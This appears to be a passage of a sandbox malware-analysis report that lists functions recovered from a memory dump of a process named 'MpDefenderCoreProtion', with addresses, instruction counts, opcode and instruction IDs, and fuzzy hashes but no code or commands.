                                      • Opcode Fuzzy Hash: 118318f7b933497407fbd0dc7c5b3009d75502ff0c7ae73446b7006ea95e6e86
                                      • Instruction Fuzzy Hash: 18F0BE317006008FC3048B2EE880AAA77F6FFC576072980AAE409CB372CA61CC07CB50
                                      Function 015711C8 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6167a6c306ea15a721b6b4e1635e7a1ee2318a332ca66ab7d1e586b74677a91b
                                      • Instruction ID: fd8b355f242ef2d4adf0af714f0aa74ab7dec4658706c4ef536fa08df442a2c9
                                      • Opcode Fuzzy Hash: 6167a6c306ea15a721b6b4e1635e7a1ee2318a332ca66ab7d1e586b74677a91b
                                      • Instruction Fuzzy Hash: BCF085357005006FC210869EE884E06BBEABFC8A24B288069F20ACB371D960EC028650
                                      Function 015711B8 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 491ce30abab912958dda4aa3aa998ed1ee1dd56af92ec12ea629b2d482425cf1
                                      • Instruction ID: 6adc4a9da2181bade3bd2d0624dc635c3b59affe99751b779e71dfead60b18b9
                                      • Opcode Fuzzy Hash: 491ce30abab912958dda4aa3aa998ed1ee1dd56af92ec12ea629b2d482425cf1
                                      • Instruction Fuzzy Hash: D3F0E5367442015FC315429EF855A96BBFAFFC937573884BFE009CB361D965CC428621
                                      Function 015713E8 Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c10378a855f91a92f58382665aadd8be3c9813bf5e5139ca7573fd7dc80c03b
                                      • Instruction ID: 80811e72aed2eb088260dd08d8fae2acd7b217af7690b3a9d05e09d502e90ddb
                                      • Opcode Fuzzy Hash: 2c10378a855f91a92f58382665aadd8be3c9813bf5e5139ca7573fd7dc80c03b
                                      • Instruction Fuzzy Hash: FAF0BE6090E38A9FCB02CBB4AD5A64C7FB4EB43200B0840EFE448CF2A3C5240D089352
                                      Function 01570FAB Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a5c85feb02403272383a632069152211005c15a3d3dc6533d26cdc6ea0670ae
                                      • Instruction ID: be4013b8fc1c8b27df65764a6273734bf8ea35cd3f3a235e3f0897d4c34fb4ac
                                      • Opcode Fuzzy Hash: 1a5c85feb02403272383a632069152211005c15a3d3dc6533d26cdc6ea0670ae
                                      • Instruction Fuzzy Hash: 7CF01774A0121DDFDB25DFA4E99ABAEBFB2BB44305F100419E002AB284CB741941CB81
                                      Function 0157B050 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7bb05e0fcb78c82e2e925a0dd71d6d615157de7d13353bc81434ab9d9fd78970
                                      • Instruction ID: ca40b2c0448aa186eec15ae68e23f53a3fd7453a4779aa76a9f7f22ae8582162
                                      • Opcode Fuzzy Hash: 7bb05e0fcb78c82e2e925a0dd71d6d615157de7d13353bc81434ab9d9fd78970
                                      • Instruction Fuzzy Hash: 59F08C70C043499FCB40DFB8D9416EEBFF8EF05200F1045AAC059E7151E7701A05CBA2
                                      Function 01576BE0 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 394b5b1aa16a98485e8a23b8d13add0d9ff29ae8dd6b48d672052436e304f38e
                                      • Instruction ID: 8616a03f7dbf8f4d5be6192bd057bf66b6455f1474c9f744976c8ca117699dc2
                                      • Opcode Fuzzy Hash: 394b5b1aa16a98485e8a23b8d13add0d9ff29ae8dd6b48d672052436e304f38e
                                      • Instruction Fuzzy Hash: B8E0C23630161297FB08155DB1113FF3ACCEB45265F0884BAE90DCB240EB2AC8418391
                                      Function 0157105A Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 418ef587973b410cbcd92862595c3bc40754a2b1bad0ff24727a452aea474432
                                      • Instruction ID: d302f44bcb382ece58142773a82a635055771c8cc8fad0cec85986529c03a346
                                      • Opcode Fuzzy Hash: 418ef587973b410cbcd92862595c3bc40754a2b1bad0ff24727a452aea474432
                                      • Instruction Fuzzy Hash: 00E04F32645349EFC725CBB499114ED7BF8AA45321B2501EBD401DA165DA3A8941CB51
                                      Function 0157B060 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bf2d5ff25fe20aae22a1bf8478ab5cb0889c48d91a8dbb04409678ac9d88749
                                      • Instruction ID: 4abaf9ca7d9965d018c10df97396d2071899bd95033d700c57f421a6d502c482
                                      • Opcode Fuzzy Hash: 4bf2d5ff25fe20aae22a1bf8478ab5cb0889c48d91a8dbb04409678ac9d88749
                                      • Instruction Fuzzy Hash: 69E0E571D1031AAFCB40EFA8DA457EEBBF8EF04211F10456AC519E7244EB706B15CBA2
                                      Function 01571068 Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b91dc8f242ba2bb558d69fce3aa7f37764fe1417dd7328f3bb5352df3abcc511
                                      • Instruction ID: 533b28d79d3e254837202c1ca477e79137da005274010f33b84e5813e4355319
                                      • Opcode Fuzzy Hash: b91dc8f242ba2bb558d69fce3aa7f37764fe1417dd7328f3bb5352df3abcc511
                                      • Instruction Fuzzy Hash: 85D01732A0520CABCB20DEB4A9015AABBECEB09205B1006EA9D09D7214EE32DA1097D1
                                      Function 015713F8 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07d03f464d5e789c281347c3f6af7d0c5bf9818054771e13af993c6f4783e7ff
                                      • Instruction ID: 8b83d7826d6bc2ff55bcbcefa3ab28f872518b26cd48c17c4480ebbe5c547d0a
                                      • Opcode Fuzzy Hash: 07d03f464d5e789c281347c3f6af7d0c5bf9818054771e13af993c6f4783e7ff
                                      • Instruction Fuzzy Hash: 08D05E70A0620DEFCF00DFA9FA4299DBBF9EB44204B1041ADE80DD7300EA312F04AB91
                                      Function 01576B98 Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f12dde5ae14764e1454d3fa30ebc98f6b0cfea6f0a437825fb892c35f52286c
                                      • Instruction ID: 69bf9fea6073fe93b8e4da93f1c5cc9a73a1e386826640b1955c892a585a9578
                                      • Opcode Fuzzy Hash: 0f12dde5ae14764e1454d3fa30ebc98f6b0cfea6f0a437825fb892c35f52286c
                                      • Instruction Fuzzy Hash: C6D0A938600A0ACBC7429F0CD004B52B3A9FF8070DF240268952406382CB3A5C26DF42
                                      Function 0157A3EB Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f30b2e4f594a9cd9508c32553904068e2459bd687265c2935bc69a01ae39f41
                                      • Instruction ID: a4d2fefbcd403ccce68d8c203c2c32c5b176d01d340719068407cb878ad5ab25
                                      • Opcode Fuzzy Hash: 8f30b2e4f594a9cd9508c32553904068e2459bd687265c2935bc69a01ae39f41
                                      • Instruction Fuzzy Hash: F5B09237B240148B4E089689B8491FDF3AAE7E8226B248033D212D28009B711A26A7A1
                                      Function 01570840 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca947d974f54956133f2434422d5280b3a77920e43f945e96a58c74f1b9a6843
                                      • Instruction ID: da9dc05d1f24d3ed39737cbfc3e18ad31f39d5b96f26419f4da4bcbd9086a7b8
                                      • Opcode Fuzzy Hash: ca947d974f54956133f2434422d5280b3a77920e43f945e96a58c74f1b9a6843
                                      • Instruction Fuzzy Hash: 9AC02B7181030CDFD7A0521468007E83BFD8796365F0100A3EC0CCE3C3F2500C004711
                                      Function 01570850 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30f133509a66e3f51908e8ca589642c60255912731fb44e92fcd42417989c33b
                                      • Instruction ID: f9dac22474e1410f707a2c7c3432bd2cc6dd2e4aa0c6b4f5f47435e454e89195
                                      • Opcode Fuzzy Hash: 30f133509a66e3f51908e8ca589642c60255912731fb44e92fcd42417989c33b
                                      • Instruction Fuzzy Hash: 6D90023504570C8B8560279575495A9779D968563AB800051F50D495455B5568104695
                                      Function 01570488 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7976e677e70c4d1e26e8535a4d543e9444b321806ed9c6375f380ca59d659cc7
                                      • Instruction ID: 6d8c9594e0298118a3c08b8ab10bbe82248ee96bcb8da5952e6e9389c31eb0d3
                                      • Opcode Fuzzy Hash: 7976e677e70c4d1e26e8535a4d543e9444b321806ed9c6375f380ca59d659cc7
                                      • Instruction Fuzzy Hash: 32A002B8601205CBCE64DF11FB5A879FFE5BBC6315F059694B40F8E1D6CB20A840CB80